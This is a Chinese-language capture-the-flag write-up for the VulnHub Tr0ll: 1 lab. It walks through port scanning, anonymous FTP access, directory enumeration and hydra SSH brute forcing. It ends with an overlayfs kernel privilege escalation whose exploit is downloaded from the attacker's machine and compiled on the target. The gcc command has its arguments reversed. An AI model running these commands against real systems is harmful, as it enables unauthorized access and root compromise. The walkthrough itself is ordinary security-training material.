当前位置: 首页 > news >正文

Tr0ll: 1靶场渗透测试

Tr0ll: 1靶场

来自 <Tr0ll: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.181,靶场IP192.168.23.185

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.185

开放的端口:

21/tcp (FTP):

  • 服务:vsftpd 3.0.2
  • 匿名FTP登录:允许匿名访问 (FTP code 230),并且上传下载权限为 rwxrwxrwx,这是一个明显的风险,因为匿名用户可以修改文件。
  • 文件 lol.pcap(8KB)可通过 FTP 下载,可能是一个潜在的敏感文件,值得进一步分析。
  • FTP 服务没有启用加密,数据传输是明文的,这可能会导致数据泄露风险。

22/tcp (SSH):

  • 服务:OpenSSH 6.6.1p1
  • 该版本的 SSH 可能包含已知的安全漏洞,但具体需要查看是否有已知的漏洞影响该版本。
  • Host Keys(服务器公钥)信息已列出:DSA、RSA、ECDSA、ED25519 四种类型的密钥。这些密钥是 SSH 协议中用来验证服务器身份的。
  • 建议确认密钥是否匹配已知的指纹,尤其是在服务器部署过程中。

80/tcp (HTTP):

  • 服务:Apache 2.4.7
  • 网站似乎没有标题(text/html),并且服务器响应头显示是 Apache 2.4.7,可能存在一些已知漏洞(尤其是旧版本的 Apache)。
  • robots.txt: 包含禁止访问的路径 /secret,这可能意味着存在一个可能包含敏感信息或私密数据的目录。
  • 该网站的内容可能不多或是一个基础的 web 服务器配置,需要进一步探查是否有可利用的漏洞。

4,既然知道开放了21端口,那就对ftp服务器匿名登录访问

dir列出文件夹下的文件,分析存在一个流量包,直接把它导出来

常见的 FTP 服务器命令

命令

描述

USER <用户名>

发送用户名进行登录。

PASS <密码>

发送密码进行登录。

QUIT

断开与 FTP 服务器的连接并退出。

CWD <路径>

更改当前工作目录。

PWD

显示当前工作目录。

LIST

列出当前目录下的文件和目录。

NLST

列出当前目录下的文件名(不包括详细信息)。

RETR <文件名>

下载指定文件。

STOR <文件名>

上传指定文件。

DELE <文件名>

删除指定文件。

RMD <目录名>

删除指定目录(目录必须为空)。

MKD <目录名>

创建一个新的目录。

RNFR <旧文件名>

重命名文件的源文件名。

RNTO <新文件名>

重命名文件的目标文件名。

ABOR

终止当前传输操作。

SYST

获取服务器的操作系统类型。

TYPE <类型>

设置文件传输的类型(例如 ASCII 或 Binary)。

PASV

启用被动模式,客户端会在连接时打开一个端口等待服务器连接。

PORT <IP地址>,<端口>

设置主动模式,服务器将连接客户端指定的 IP 和端口。

SITE <命令>

向 FTP 服务器发送特定的 SITE 命令(如设置文件权限)。

HELP

显示可用的 FTP 命令及其说明。

FEAT

显示 FTP 服务器支持的扩展特性。

STAT

获取 FTP 服务器的状态信息。

5,使用wireshark打开pcap文件

在info一栏注意到NO.40,分析详情信息,存在提示

好吧,好吧,好吧,你不是一个聪明的小恶魔吗,你差点找到Sup3rs3cr3tdirol:-P\n

\n

糟透了,你离得太近了。。。我要更努力\N

6,然后再访问http://192.168.23.185

一个没有什么用的静态页面,对其进行网页子目录枚举扫描

dirsearch -u http://192.168.23.185 -x 404,403

访问 http://192.168.23.185/robots.txt

http://192.168.23.185/secret/

被耍了,没有什么用,再访问/sup3rs3cr3tdirlol

下载到一个文件

 wget http://192.168.23.185/sup3rs3cr3tdirlol/roflmao

7,file roflmao分析文件类型

文件分析总结:

  1. 文件类型
    • ELF 32-bit LSB executable:表明这是一个针对32位x86架构的Linux可执行文件,采用小端(Little-Endian)字节序。
  2. 架构与兼容性
    • Intel 80386:编译目标为传统的32位x86 CPU,需在支持IA-32指令集的系统或兼容环境(如64位系统安装32位库)下运行。
    • 动态链接(dynamically linked):依赖外部共享库(.so文件),若系统中缺少相关库文件,程序将无法启动。
    • 解释器路径(/lib/ld-linux.so.2):典型的32位动态链接器路径,64位系统需确保已安装32位兼容库(如Ubuntu的libc6:i386)。
  3. 编译环境
    • GNU/Linux 2.6.24:编译时使用的内核版本较旧(2008年发布),可能需注意glibc版本兼容性问题。若目标系统glibc版本低于编译时版本,程序可能无法运行。
  4. 调试信息
    • not stripped:保留符号表和调试信息,便于逆向工程或调试(如使用gdb时能看到函数名)。
  5. BuildID
    • SHA1哈希:可用于唯一标识该二进制文件,查询是否存在于公共数据库(如漏洞报告、恶意软件样本库)。

8,使用stings查看文件内容

Find address 0x0856BF to proceed意思暗示找到地址0x0856BF,访问之

分别查看网站的内容,

下载这个用户名字典

wget http://192.168.23.185/0x0856BF/good_luck/which_one_lol.txt

又得到了用户名密码

9,既然信息收集到了用户名字典和密码,接下来就是hydra爆破ssh

hydra -L which_one_lol.txt -p Pass.txt 192.168.23.185 ssh

就此成功爆破出来用户名/密码:overflow/Pass.txt

10,然后再进行ssh登录

使用python脚本启动一个可交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

再收集一下内核及版本信息

uname -a

lsb_release -a

11,搜搜提权利用exp

searchsploit overlayfs 

将exp文件转储出来 searchsploit overlayfs -m 37292.c

开启http服务python http.server

使用靶场wget下载exp文件夹

cd /tmp

wget http://192.168.23.182:8000/37292.c

gcc编译C语言文件 gcc -o 37292.c 37292

给权限执行该文件

chmod +x 37292

./ 37292

12,成功变成root用户,cat得到flag

相关文章:

  • 基于JAVA+SpringBoot+Vue的前后端分离的职称评审管理系统
  • mamba_ssm和causal-conv1d详细安装教程
  • 【Spring IoC】容器和IoC介绍以及IoC程序开发的优势
  • django.core.exceptions.ValidationError
  • flink介绍
  • 【springboot】Spring 官方抛弃了 Java 8!新idea如何创建java8项目
  • 突破网络壁垒:实现 Mac SSH 访问 Windows WSL Ubuntu 的最佳实践20250301
  • 【Linux】Linux的基本指令(3)
  • PostgreSQL10 逻辑复制实战:构建高可用数据同步架构!
  • Android JNI开发指南
  • IP段转CIDR:原理Java实现
  • 优云智算:借助强大镜像社区,开启AI算力新纪元!
  • Flutter的permission_handler插件检查iOS的通知权限不准确
  • iphone上ios设备开启safari开发者debug模式,配合mac电脑使用
  • SLAM网站连接
  • playbin之autoplug_factories源码剖析
  • Windows文件资源管理器左侧导航窗格没有WSL的Linux图标的解决方法
  • eNSP中AR2220、AR201、AR1220、AR2240、AR3260、Router、NE40E、NE5000E、NE9000、CX路由器学习笔记
  • 算法-二叉树篇15-最大二叉树
  • 蓝桥杯 路径之谜
  • 江门网站建设费用/出售网站平台
  • 在线营销型网站制作/免费网页代码大全
  • wap网站制作需要多少钱/网络营销的常用方法
  • 宁波p2p网站建设/太原seo全网营销
  • 网站建设与网页设计专业的/贺州seo
  • 日本网站开发前端/谷歌chrome官网